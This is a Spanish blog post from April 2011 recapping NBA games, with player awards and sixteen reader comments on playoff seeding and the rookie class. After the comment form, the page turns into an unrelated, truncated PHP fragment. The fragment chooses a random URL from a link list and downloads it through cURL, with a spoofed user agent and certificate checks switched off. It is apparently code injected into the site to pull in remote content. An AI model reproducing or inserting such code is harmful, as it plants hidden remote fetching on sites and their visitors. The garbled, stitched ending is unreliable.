La Crónica (06/04/2011)

07 de April de 2011 por TheDeerHunter

Los Spurs aseguran por fin la primera plaza del Oeste. Solvente victoria contra Sacramento con la misma buena imagen que han transmitido todo el curso (92-124). Ahora tan solo les queda asegurarse la ventaja campo para todas las eliminatorias. Se llega a esta situación gracias a la tercera derrota consecutiva de Lakers. Pésimo momento para flojear. Anoche sólo fueron capaces de anotar 87 puntos a la “férrea” defensa de los Warriors, lastrados por las pérdidas y por un mal día en el lanzamiento exterior y desdel tiro libre. David Lee cuajó otro gran partido ayudado por unos Monta Ellis y Stephen Curry algo fallones (87-95).

No aprovecharon el resultado ni Dallas por un lado, ni Miami por el otro. Los Mavs, sin Kidd ni Chandler, fallaron ante unos Nuggets que se están convirtiendo en los jueces del Oeste (y lo que les queda, cuidado). Gran actuación de JR Smith por destacar una de tantas, ya que todo el equipo brilló (104-96). Por su parte, los Heat recibieron a los Bucks sin Wade y lo pagaron (90-85). LeBron estuvo a punto de levantar el partido a su estilo, pero no pudo ser. A los Bucks, sin embargo, tampoco les vale de nada la victoria, pues los Pacers cerraron su clasificación para playoffs endosando 136 puntos a Washington, con una impresionante actuación de Granger y Paul George, también entre otros (112-136).

Otros que se aseguraron su participación en la postemporada son los Hornets, que anoche acabaron, a la vez, con las esperanzas de los Rockets (93-101). Chris Paul se comió a Lowry y en esta ocasión, tuvo un gran escudero en Ariza como también en Jarret Jack. Los Rockets se despiden, como siempre hacen, vendiendo cara su piel.

En el Este, los Knicks recuperaron la 6ª plaza arrebatándosela directamente a los Sixers (97-92). Melo se ha erigido las últimas semanas como líder inequívoco y parece que los resultados le han respaldado. Esto debería despejar algunas dudas que se tienen contra él.

Finalmente, en otros partidos de menor importancia clasificatoria,  Orlando ganó a Bobcats en la prórroga en el mejor partido de Arenas desde que llegó a Florida (111-102); los Thunder sudaron para domar a “La Bestia” y a sus Clippers (108-112); los Suns ganaron en Minneapolis con Gortat comiéndose a Milicic (108-98); Cleveland ganó en Toronto (104-96) y Detroit se deshizo de New Jersey 109-116, gracias entre otros a Stuckey (y a que no jugaba Deron).

PREMIOS

MVP: A un rebote del triple doble se quedó Chris Paul en la victoria de los Hornets sobre Houston. El base de New Orleans anotó 28 puntos, regaló 10 asistencias y cogió 9 rebotes. Como premio recibió la clasificación definitiva para los Playoffs.

Rookie: Como Blake Griffin tiene premio propio, lo suyo será destacar a Paul George (23 puntos, 3 rebotes y 4 asistencias), Greg Monroe (20-10) y John Wall (19-9-4). ¿Seguro que la nueva hornada es mejor que esta?

Sorpresa: Después de una primera temporada en la que estuvo prácticamente inédito, Gerald Henderson ha encontrado su juego en Charlotte. Anoche fueron 32 puntos, 5 rebotes y 4 asistencias. Ejemplo claro de la escuela de Duke.

Decepción: José M. Calderón falló los 7 lanzamientos que intentó anoche aunque lo medio compensó con sus 9 asistencias. Se acerca el final de otra temporada decepcionante para los Raptors.

Esfuerzo en vano: Las 2 mejores actuaciones del día se quedan sin premio. Por un lado el 35-11-6 de Blake Griffin, que llega en plenitud de facultades al final de la regular, y por el otro el 39-7-4 de Brook Lopez, fantástico en los últimos 2 partidos.

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Bueno, se van despejando plazas de PO y los Spurs demuestran que son los más fuertes. En el Oeste sólo falta que los ositos certifiquen su pase, aunque parecen carne de primera ronda. Lo más esperado puede ser las eliminatorias de Thunder y Mavs, contra Nuggets y Hornets, puede que veamos alguna sorpresa.
    En el este que Indiana se clasifique con un 36-43 ya no le sorprende a nadie, pero es que en el Oeste Utah con 37-41 se queda muy fuera de PO. La buena noticia para mis Knicks es la recuperación de la sexta plaza en una gran noche de Carmelo, que pareció querer responder la pregunta que hice ayer. Ante los Heat en primera ronda poco se podrá hacer, a no ser que Turiaf se convierta en Howard o algo así… A ver quién para a LeBron y Wade…
    Por lo demás, una pena que Griffin y Wall no jueguen mucho más y que Jennings no haya explotado realmente.
    ¿Cuándo apuestas para el Play-Off? Un saludo!!!

      Citar

  2. Len Bias dice:
    #2

    Difícil va a estar que los que vengan sean mejores que los rookies de este año, a mi me parece una promoción espectacular.
    Griffin, Wall, Cousins, George, Monroe, Jordan Crawford, Hayward, Turner si espabila, Ed Davis, Fields, Favors, Wes Johnson, Booker… mucha tela

      Citar

  3. Javijaen dice:
    #3

    @Txusma, lo de 29 años y viejo es relativo, ya uno se sorprende de lo que se encuentra en la red… Opino como tú de Carmelo, no es santo de mi devoción, sobre todo porque me recuerda un poco a Iverson en su carisma (aunque solo un poco jeje). Amaré ha sido muy acertado, pero demasiado caro su fichaje, algunos millones menos hubieran dado para un mejor equipo, pero es que la frustración de no tener a LeBron fue grande y las decisiones desesperadas.
    Espero que Billups se quede, pero cuidado con sus lesiones, y que a Stoudemire le acompañe algún otro pivot poderoso. También sería aconsejable seguir dándole bola a Fields y a Douglas (por cierto, gran partido de este último al menos en estadísticas).
    Espero que vuestra previsión sobre los PO sea errónea y los Knicks den el sorpresón dejando fuera a LeBron-Wade-Bosh… ¿Os imaginais?

      Citar

  4. Busky23 dice:
    #4

    Por fin los Spurs se aseguran justamente la ventaja de campo en el Oeste,han sido el equipo mas constante de la liga regular a pesar del bajoncillo sufrido estas 2 ultimas semanas.
    Todo lo contrario que sus vecinos los Mavs que llegan muy justitos de forma de cara a playoffs.
    Mientras los Lakers vuelven a pajarear como tantas veces (demasiadas) hemos visto este año. Inaceptable la derrota de hoy a estas alturas y eso que Curry y Ellis han estado muy fallones.
    Mucho rookie luciendose últimamente,no ha sido tan malo este draft…

      Citar

  5. Txusma dice:
    #5

    Kantonyo comentaba que la nueva hornada puede ser mejor que la anterior pero viendo el nivel de esta aún quitando a Griffin, y la posibilidad de que varios jugadores como Sullinger o Barnes finalmente no se presenten, me hace dudar de esta afirmación.

    @javijaen No. No me puedo imaginar que los Knicks se carguen a los Heat. Sería increíble.

      Citar

  6. Sancho88 dice:
    #6

    hombre, esta claro que no va a ser un 4-0 para Miami. Yo creo que el Staples puede hacer fuerza y seguro que dos partiditos sí que ganan los Knicks allí. Aparte, si en los dos primeros en Florida pueden arañar uno… ojo con ellos. No son Lebron o Wade, pero Melo y Stat son estrellas también, y Billups es un señor base, aparte del buen juego colectivo de Fields, la manita de Douglas… quien sabe. Yo creo que puede haber 7 partidos ahí eh? yo di mucha caña a los Knicks hace poco, y le cargue la responsabilidad directamente a Melo, no a D’Antoni. Efectivamente, se esta viendo que ante un mayor rendimieno del crack, las dudas con D’Antoni desaparecen. No se puede exigir menos a una estrella. Es como si Miami lo hace mal y le examos las culpas a Spoelstra.
    Y nada, esperando estamos todos a la madrugada del 16 no? joder, una semana apenas para las fases finales, y este año se me antojan insuperables, por lo menos a partir de semifinales. Hay muchos gallos en el corral esta vez

      Citar

  7. max dice:
    #7

    Atención a OKC que sólo esta a una victoria de Dallas y puede cruzarse en segunda ronda con LAL. No creo que esto guste mucho a todos los seguidores de Lakers que hay en el blog, mas que nada porque ahora mismo veo mucho más fácil superar a Mavs que a Thunder. De hecho, para mi OKC es el peor rival para Lakers en el Oeste.

      Citar

  8. TheDeerHunter dice:
    #8

    Ya te puedes imaginar la gracia que nos haría…

      Citar

  9. Cocinitas dice:
    #9

    Cuidadito en el oeste porque a mi portland y denver me parecen dos rivales peligrosisimos no tengo yo tan claro q pasen dallas y oklahoma. Y si, para los Lakers el peor rival son los Thunder ya se vio el año pasado, y este año con Perkins son mucho mas duros por dentro. Aún asi si no hay lesiones ni falta de ambiciòn no veo a nadie en el oeste capaz de tumbar a los Lakers.
    En cuanto al este creo q miami ganara en 5 partidos a knicks ( o philadelphia) y creo q las semifinales de conferencia si estan mucho más claras aqui que en oeste, y hablando de semifinales de conferencia tengo ganas de ver el celtics-heat ya q creo q de ahi saldra el rival de lakers en la final.

      Citar

  10. Ru dice:
    #10

    En mi opinión esta hornada de rookies no será demasiado buena -al único que veo figura de la NBA será Irving- ,ni hablar de si podrá superar a la del año pasado -opino todo lo contrario para el año que viene,donde veo mucho jugador crack-.Centrándome en Barnes este año podría dar perfectamente el salto a profesionales porque hay mucho equipo sin un SF de su potencial -¿la pieza que falta en los Wizards?-.

    Yo esperando totalmente a los PO…tachando los días 🙂

      Citar

  11. Denise dice:
    #11

    Podría firmar que si los Knicks se cargan a los Heat, yo me acuesto con Carmen de Mairena ….XD.
    Total, sé que no va a suceder, puesto que los Knicks no les doy ninguna opción de que se zumben a los Heat (con el Big Three sano).
    Estos ultimos partidos de Temporada Regular me aburren ya un poco, hay ganas de que empiece lo que realmente importa.

      Citar

  12. Cocinitas dice:
    #12

    Ufff yo este año veo a tres jugadorazos como son Griffin, Wall y Cousins. Y a muchos q seran titulares importantes como Monroe, Fields, Crawford, Turner con un par de añitos más, etc etc. De este año me gusta lo q he visto de Sullinger y por supuesto Irving.

      Citar

  13. Vader dice:
    #13

    Juer Denise mira que eres valiente… Carmen de Mairena… Palabrad mayores. Si palmaran los Heat en vez de Denise te tendras que llamar Torrente 4 XD.

    Saludos

      Citar

  14. Txusma dice:
    #14

    Pues Sullinger no se presenta al draft así que…

      Citar

  15. Denise dice:
    #15

    jajja tranquilo, estos Knicks no tienen nada que hacer en playoffs, al menos este año…(y dudo que en los siguientes hagan algo grande…)

      Citar

  16. GreenPride dice:
    #16

    ¿Alguien se explica a que están jugando los Lakers en estos tres últimos partidos? Porque sinceramente estoy desconcertado. Parecía que acosarían a los Spurs por el primer puesto del Oeste y que la ventaja campo contra Celtics o Heat en unas posibles finales estaba ya conseguida tras su fenomenal racha tras el All Star pero de repente han perdido 3 partidos seguidos y de nuevo los Celtics los han cogido y los Heat los también de no ser por su derrota con los Bucks.
    No sé por qué la gente desprecia la ventaja de campo ya que en eliminatorias muy igualadas suele ser factor decisivo. Los Lakers están regalandola igual que antes hicieron los Celtics y ya veremos si luego no les pasa factura a la hora de la eliminatorias importantes.
    Para los seguidores verdes fue un día feliz ya que las derrotas de Lakers y Heat les dejan por delante de los Heat e igualados a los Lakers y de repente con la ventaja campo a tiro contra estos dos posibles rivales. Veremos que pasa hoy en Chicago, interesantísimo partido, muy importante para los verdes no tanto para los Bulls.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>